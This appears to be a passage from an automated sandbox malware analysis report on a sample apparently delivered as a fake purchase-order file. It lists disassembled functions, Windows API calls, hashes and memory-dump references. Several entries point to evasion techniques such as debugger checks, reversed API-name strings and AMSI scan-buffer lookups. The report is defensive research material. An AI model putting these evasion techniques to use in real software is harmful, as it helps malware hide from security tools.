                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                                                          • Opcode ID: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                                                                                                          • Instruction ID: 4600b78ba860fbead209e29b526e038162604ca901d989cbafc064485c8b12db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5201F2B16116446FF612BA64CD11BAF776DDB81710FD101F0F510E66D8DA75AE00CA64
                                                                                                                                                                                                                          Function 02B1AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F
                                                                                                                                                                                                                            • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                          • Opcode ID: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                                                                                                                          • Instruction ID: ee8bb3042f577d2e0c7255a6f09aca5ea51ad736c6efaadc0f55119a3c858ffe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6419DB17055484BDB11EBB888906BFB3FBEF96300BE445E6D452C3394EB24F905CA65
                                                                                                                                                                                                                          Function 02B281CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                          • API String ID: 1883125708-1952140341
                                                                                                                                                                                                                          • Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                                                                                                                          • Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35
                                                                                                                                                                                                                          Function 02B2F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                          • Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                                                                                                                          • Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114
                                                                                                                                                                                                                          Function 02B1C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                          • Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                                                                                                                          • Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A
                                                                                                                                                                                                                          Function 02B1E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02B1E353
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                          • Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4
                                                                                                                                                                                                                          Function 02B1AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                          • Opcode ID: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                                                                                                          • Instruction ID: d58cfe81125ad10bfdf3ba6542c7014e81ca62ecfa7c7af2931d1908ae09dd76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50
                                                                                                                                                                                                                          Function 02B1AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                                                          • Opcode ID: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                                                                                                          • Instruction ID: 1074368ccee03c30cad020c43305fa14c04f6342f3ac3594c4c1881c073b42c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E648E7241DB74AF84CF50
                                                                                                                                                                                                                          Function 02B11C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                                                                                                          • Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650
                                                                                                                                                                                                                          Function 02B194EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
                                                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                          • Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                                                                                                          • Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5
                                                                                                                                                                                                                          Function 02B28338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                          • API String ID: 3811539418-184458249
                                                                                                                                                                                                                          • Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                                                                                                                          • Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29
                                                                                                                                                                                                                          Function 02B2AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
                                                                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                                                                                                          • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                          • Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:4.6%
                                                                                                                                                                                                                          Total number of Nodes:1242
                                                                                                                                                                                                                          Total number of Limit Nodes:27
